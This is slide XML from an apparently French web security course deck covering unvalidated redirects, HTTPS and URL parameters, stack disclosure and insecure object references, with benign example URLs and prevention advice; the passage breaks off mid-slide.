          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="f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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2733675"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>Redirection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Shape 37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35</a:t>
            </a:fld>
            <a:endParaRPr lang="f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b="18247"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7842650" y="1187326"/>
            <a:ext cx="1180775" cy="987074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Shape 380"/>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Unvalidated Redirects and Forwards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Shape 38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Définition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Shape 382"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240900" y="1564100"/>
            <a:ext cx="8903100" cy="4703999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Exemple :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>“Votre produit a bien été ajouté, vous pouvez le modifier en cliquant ici :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://securite-app-gruyere.herokuapp.com/authentification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?pageCible=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://securite-app-gruyere.herokuapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/compte/produits/103</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr u="sng">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2934775" y="4337423"/>
            <a:ext cx="2724150" cy="1219075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 38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36</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirection invalide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Shape 390"/>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DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225776" y="1474599"/>
            <a:ext cx="4692449" cy="3908800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unvalidated Redirects and Forwards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>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Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Shape 399"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1646775"/>
            <a:ext cx="8782500" cy="4721399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Interdire les redirections absolues ou vérifier le domaine (principe de whitelist)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Préférer un paramètre de redirection relatif ou abstrait</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Traduction en url “réelle” côté serveur </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?pageCible=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/compte/produits/103</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ou encore </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?pageCible=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prd103</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Shape 400"/>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2733675"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Shape 406"/>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="f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Safe Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Shape 90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="328000" y="1706200"/>
            <a:ext cx="8487998" cy="3943674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Shape 91"/>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What you’re doing is wrong</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Shape 92"/>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a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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26994" y="257709"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240925" y="1418175"/>
            <a:ext cx="8903100" cy="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transit des données sensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attention aux paramètres d’URL dans les requêtes HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les URLs sont présentes dans :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les logs des serveurs (accesslog)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’historique navigateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>le referrer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6677025" y="4315850"/>
            <a:ext cx="2466974" cy="1621400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Shape 41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40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2428875"/>
            <a:ext cx="7772400" cy="1470000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="6000"/>
              <a:t>Divulgation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Shape 420"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="421" name="Shape 421"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="4093575"/>
            <a:ext cx="2286000" cy="1009650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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Divulgation des logiciels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Shape 427"/>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Keep your stack secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="428" name="Shape 428"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4204877" y="1100125"/>
            <a:ext cx="4939125" cy="4565725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="429" name="Shape 429"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="617406" y="3681075"/>
            <a:ext cx="4008025" cy="2353475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126987" y="1636200"/>
            <a:ext cx="2876550" cy="1200149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="431" name="Shape 431"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499600" y="2423312"/>
            <a:ext cx="2876549" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Shape 432"/>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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126994" y="257709"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Insecure redirect object reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Shape 438"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317125" y="1494375"/>
            <a:ext cx="8570099" cy="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Exposition de références dans les URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
